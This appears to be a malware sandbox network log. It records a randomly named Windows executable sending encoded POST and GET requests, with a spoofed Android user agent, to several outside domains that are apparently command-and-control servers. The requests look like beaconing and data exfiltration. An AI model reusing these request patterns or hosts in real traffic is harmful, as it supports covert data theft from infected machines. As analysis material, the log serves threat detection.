Nov 2, 2024 08:13:03.116794109 CET | 532 | OUT | GET /4q66/?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:13:03.761482954 CET | 399 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 259
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49357 | 38.47.232.160 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:08.907262087 CET | 774 | OUT | POST /wh1i/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Origin: http://www.44kdd.top
                                                                                                                              Referer: http://www.44kdd.top/wh1i/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=Admh/P5tA4M5Ww/TEcdjoh7JTK7mZIT8OGgAcaya3rc1xnFpsoC6jUB7uMOx8hXhlVF9ntJ7fxkX4XjQlgobwmxCLvhxPHdxlXtv6f9HbedAKfaDCbPdkh8TrqLEc1ZBR3PftjlRVTXBb4LbTFGxcY8ytcNzqPRhWAj9ruAOCFDxTCvgXCvEYp+gRsC2Gn4ANw==
Nov 2, 2024 08:13:10.082779884 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:09 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49358 | 38.47.232.160 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:11.459292889 CET | 794 | OUT | POST /wh1i/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Origin: http://www.44kdd.top
                                                                                                                              Referer: http://www.44kdd.top/wh1i/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=Admh/P5tA4M5XUDTG9dj9x7GWK7mM4T4OGsAcb2K3dM1/n1ptpC6u0B7msP74hXQlV5DnoJ7fwEX4SfQ5CAcw2xAefh3BndxlXtv6fppbeFAKsCDD6Pe7R8UsqLEKFZNR3O6tmF/VWTBb93bTRauVY8owMMQjcImZDGwvoQoFmfsSEi6GzOTKpaTMrLCLkFJW8XchIBXgTGcXArdzxvwqpc=
                                                                                                                              Nov 2, 2024 08:13:13.423067093 CET  312                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:13:13.423094988 CET  312                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:13:13.423450947 CET  312                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:13:13.423636913 CET  312                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              19          192.168.2.4  49359        38.47.232.160   80                3512  C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp                           Bytes transferred  Direction  Data
                                                                                                                              Nov 2, 2024 08:13:14.009269953 CET  10876              OUT        POST /wh1i/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Origin: http://www.44kdd.top
                                                                                                                              Referer: http://www.44kdd.top/wh1i/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ= [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:13:15.286664009 CET  312                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:14 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              20          192.168.2.4  49360        38.47.232.160   80                3512  C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp                           Bytes transferred  Direction  Data
                                                                                                                              Nov 2, 2024 08:13:16.556499004 CET  522                OUT        GET /wh1i/?Z0WTZ=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:13:17.553376913 CET  312                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:17 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              21          192.168.2.4  49361        34.92.109.131   80                3512  C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp                           Bytes transferred  Direction  Data
                                                                                                                              Nov 2, 2024 08:13:23.302743912 CET  777                OUT        POST /qgza/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Origin: http://www.dbasky.net
                                                                                                                              Referer: http://www.dbasky.net/qgza/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=nW36fIgzsujGm1PSf+XAlzOn03j2XmhKebasPOj3jd1EEc8s9E5XPwi6AH7NQPCfRrZK58ElpDLshG3G45kjs0zMiGkeH5aJ6kGQIhBf6FlI0N6PvtucAlbU3QRBVSAx1kJ2OFiviUHsM8/u7kv2uNIEqSV28zdiaa+x96QzVRHCkBqlVLt+DNa142T/mbn1lg==
                                                                                                                              Nov 2, 2024 08:13:24.274424076 CET  289                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:24 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              22          192.168.2.4  49362        34.92.109.131   80                3512  C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp                           Bytes transferred  Direction  Data
                                                                                                                              Nov 2, 2024 08:13:25.852111101 CET  797                OUT        POST /qgza/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Origin: http://www.dbasky.net
                                                                                                                              Referer: http://www.dbasky.net/qgza/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=nW36fIgzsujGp1/SeZjApDOox3j2A2hOebmsPLDnjvhEE9Ms8GBXIwi6YX7IUPCERsR458IlpDPshGHG7KdRtkzKtmkcYJaJ6kGQIghx6FtI39qP9fKfJFbTwQRBRSA11kIjOAeBiSLsM5Du7Vv3lNIduSVl92tmXvTDjJhWUVzVonn/E6MpRN+GlxaLrYa8+tC+QduYvZONvq0yPSrAMow=
                                                                                                                              Nov 2, 2024 08:13:26.807383060 CET  289                IN         HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:26 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49363 | 34.92.109.131 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:28.403348923 CET | 10879 | OUT | POST /qgza/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Origin: http://www.dbasky.net
                                                                                                                              Referer: http://www.dbasky.net/qgza/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:13:29.369029999 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:29 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49364 | 34.92.109.131 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:30.940154076 CET | 523 | OUT | GET /qgza/?Z0WTZ=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:13:31.910661936 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:31 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49365 | 162.0.211.143 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:37.150755882 CET | 780 | OUT | POST /icpx/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Origin: http://www.zoptra.info
                                                                                                                              Referer: http://www.zoptra.info/icpx/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=JUs/7o27n1e9T4wjRtsVpj+I6Iv31XXb9lxRUGPM/Z718bS36bYLvLH8e6xO3jasBhZLCIjvDwki6VVdRV5/Ywjg2AJcy+xQNmCp5yFeo83an0/5bFaji1Zxkw/8JQbohKSk3Zm1EEZOFFJ4tNVgOjMQrhvTBKM40MRtM29HM0TBnttx+AcIX+dQORQf2TNPQg==
Nov 2, 2024 08:13:37.820764065 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:37 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49366 | 162.0.211.143 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:39.696094036 CET | 800 | OUT | POST /icpx/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Origin: http://www.zoptra.info
                                                                                                                              Referer: http://www.zoptra.info/icpx/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=JUs/7o27n1e9JZAjXOEVlT+X2ov3gnXX9ltRUH7m4rf18/e37aYLoLH8RawEqTazBhdDCNbvD2Ii6XNdRjx+bAjm/gJe8exQNmCp5yQ5o4TanHn5bkagh1ZytQ/8fgbkhKTJ3Y6TEGROFAt4uZBnEjMS2xuvMPtHtvhkMA9GHHjSirgrvx9fF+5jTWZr7QwGLsScJfwpSCa97xtPXUJwdGw=
Nov 2, 2024 08:13:40.367548943 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:40 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49367 | 162.0.211.143 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:42.261341095 CET | 10882 | OUT | POST /icpx/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Origin: http://www.zoptra.info
                                                                                                                              Referer: http://www.zoptra.info/icpx/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:13:43.005470991 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:42 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49368 | 162.0.211.143 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:44.864203930 CET | 524 | OUT | GET /icpx/?Z0WTZ=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:13:45.535084009 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:45 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49369 | 195.110.124.133 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:50.677325010 CET | 801 | OUT | POST /uhg3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Origin: http://www.nutrigenfit.online
                                                                                                                              Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=MaM2/a9Gy1cbOOUIGjCwNIZI/sJnAh1rC87c0QLkcABLKd6muUaRZSdUc6//XcF7yjfqlZtygkFcxUE/NwUFhWSZX59w9uEV6DBiiC+zo+eyzfFmAMDwfp6yyfY52hBr94B2IGsFWIa50Ntrpn1kdigyHN30w+RoghMn0mmCzGETBvHY4KBkI5r/w6XNXj6INw==
Nov 2, 2024 08:13:51.542506933 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:51 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49370 | 195.110.124.133 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:53.227554083 CET | 821 | OUT | POST /uhg3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Origin: http://www.nutrigenfit.online
                                                                                                                              Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                              Content-Length: 222
